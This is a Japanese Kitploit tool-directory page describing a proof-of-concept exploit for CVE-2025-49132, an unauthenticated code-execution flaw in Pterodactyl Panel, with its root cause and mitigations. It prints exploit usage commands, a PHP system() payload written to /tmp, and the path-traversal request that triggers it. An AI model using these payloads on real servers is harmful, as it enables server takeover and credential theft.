Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — CVE-2025-49132 (GHSA-24wv-6c99-f843) の PoC エクスプロイト – Pterodactyl Panel ≤ 1.11.10 における認証不要のリモートコード実行 | Kitploit
ツール/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

CVE-2025-49132 (GHSA-24wv-6c99-f843) の PoC エクスプロイト – Pterodactyl Panel ≤ 1.11.10 における認証不要のリモートコード実行

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト
36ヶ月前未レビュー

CVE-2025-49132

Pterodactyl Panel - 認証不要のリモートコード実行 (RCE)


🔎 概要

CVE‑2025‑49132 は、Pterodactyl Panel <= 1.11.10 に影響を与える深刻なリモートコード実行の脆弱性です。

認証されていない攻撃者は、/locales/locale.json エンドポイントにおける不適切な入力検証を悪用し、任意のシステムコマンドを実行できます。

修正バージョン: 1.11.11


📌 影響

悪用に成功すると以下が可能になります:

  • 認証不要のリモートコード実行
  • 機密ファイル(例: .env)の読み取り
  • データベース認証情報の抽出
  • サーバーの完全な侵害

深刻度: Critical


🧠 根本原因

この脆弱性は、以下のパラメータの不適切な検証に起因します:

  • locale パラメータ
  • namespace パラメータ

攻撃者は以下が可能です:

  1. ディレクトリトラバーサル(../../../../../)の悪用
  2. config-create の活用
  3. 任意のPHPペイロードを /tmp に書き込む
  4. 細工されたnamespaceローディングによる実行のトリガー

脆弱性分類: CWE-94 -- コード生成の不適切な制御


🚀 概念実証 (PoC)

使用方法

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

例

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

デフォルトパス:

root@kitploit:~
/usr/share/php/PEAR

適切なパスを /phpinfo.php ページから取得 alt text


🛠 悪用の流れ

ステップ 1 - ペイロードの書き込み

攻撃者は以下を使用して、悪意のあるPHPペイロードを /tmp/payload.php に注入します:

root@kitploit:~
/<?=system('id')?>+/tmp/payload.php

ステップ 2 --- 実行のトリガー

以下の呼び出しにより:

root@kitploit:~
?locale=../../../../../tmp&namespace=payload

サーバーは注入されたPHPを実行します。

alt text

🛡 緩和策

  • Pterodactyl Panel >= 1.11.11 にアップグレード
  • locale および namespace 入力をサニタイズ
  • 危険なPHP関数を無効化
  • 不要なエンドポイントの公開を制限

📚 参考文献

  • GitHub Advisory: GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Pterodactyl Panel v1.11.11 Patch Commit

ツールをダウンロード